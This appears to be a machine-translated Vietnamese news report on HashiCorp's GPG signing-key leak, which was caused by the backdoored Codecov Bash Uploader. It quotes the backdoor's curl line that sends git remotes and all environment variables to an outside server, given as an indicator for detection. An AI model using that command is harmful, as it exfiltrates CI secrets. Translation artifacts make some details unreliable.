HashiCorp, được biết đến với việc phát triển các công cụ nguồn mở Vagrant, Packer, Nomad và Terraform, đã thông báo về vụ rò rỉ khóa GPG riêng được sử dụng để tạo chữ ký số xác minh các bản phát hành. Những kẻ tấn công có được quyền truy cập vào khóa GPG có thể thực hiện các thay đổi ẩn đối với các sản phẩm HashiCorp bằng cách xác minh chúng bằng chữ ký số chính xác. Đồng thời, công ty tuyên bố rằng trong quá trình kiểm toán, không có dấu vết cố gắng thực hiện các sửa đổi đó được xác định.
Khóa GPG bị xâm phạm hiện đã bị thu hồi và thay thế bằng một khóa mới. Vấn đề này chỉ ảnh hưởng đến quá trình xác minh bằng các tệp SHA256SUM và SHA256SUM.sig và không ảnh hưởng đến việc tạo chữ ký số. Linux- Các gói DEB và RPM được phân phối thông qua releases.hashicorp.com, cũng như các cơ chế phê duyệt bản phát hành cho macOS и Windows (Mã xác thực).
Vụ rò rỉ xảy ra do việc sử dụng tập lệnh Codecov Bash Uploader (codecov-bash) trong cơ sở hạ tầng, được thiết kế để tải xuống các báo cáo độ phủ mã từ các hệ thống tích hợp liên tục. Trong cuộc tấn công vào Codecov, một cửa hậu đã được bí mật chèn vào tập lệnh, được sử dụng để gửi mật khẩu và khóa mã hóa đến... máy chủ những kẻ xâm nhập.
Để hack, kẻ tấn công đã lợi dụng một lỗi trong quá trình tạo hình ảnh Codecov Docker, cho phép chúng trích xuất dữ liệu truy cập vào GCS (Google Cloud Storage), cần thiết để thực hiện các thay đổi đối với tập lệnh Bash Uploader được phân phối từ codecov.io trang mạng. Những thay đổi này được thực hiện vào ngày 31 tháng XNUMX, không bị phát hiện trong hai tháng và cho phép kẻ tấn công trích xuất thông tin được lưu trữ trong môi trường hệ thống tích hợp liên tục của khách hàng. Bằng cách sử dụng mã độc được thêm vào, kẻ tấn công có thể lấy thông tin về kho lưu trữ Git đã được thử nghiệm và tất cả các biến môi trường, bao gồm mã thông báo, khóa mã hóa và mật khẩu được truyền đến các hệ thống tích hợp liên tục để tổ chức quyền truy cập vào mã ứng dụng, kho lưu trữ và dịch vụ như Amazon Web Services và GitHub.
Ngoài lệnh gọi trực tiếp, tập lệnh Codecov Bash Uploader đã được sử dụng như một phần của các trình tải lên khác, chẳng hạn như Codecov-action (Github), Codecov-circleci-orb và Codecov-bitrise-step, những trình tải lên này cũng bị ảnh hưởng bởi sự cố. Tất cả người dùng codecov-bash và các sản phẩm liên quan nên kiểm tra cơ sở hạ tầng của họ, cũng như thay đổi mật khẩu và khóa mã hóa. Bạn có thể kiểm tra sự hiện diện của cửa hậu trong tập lệnh bằng sự hiện diện của dòng Curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /tải lên/v2 || ĐÚNG VẬY
Nguồn: opennet.ru
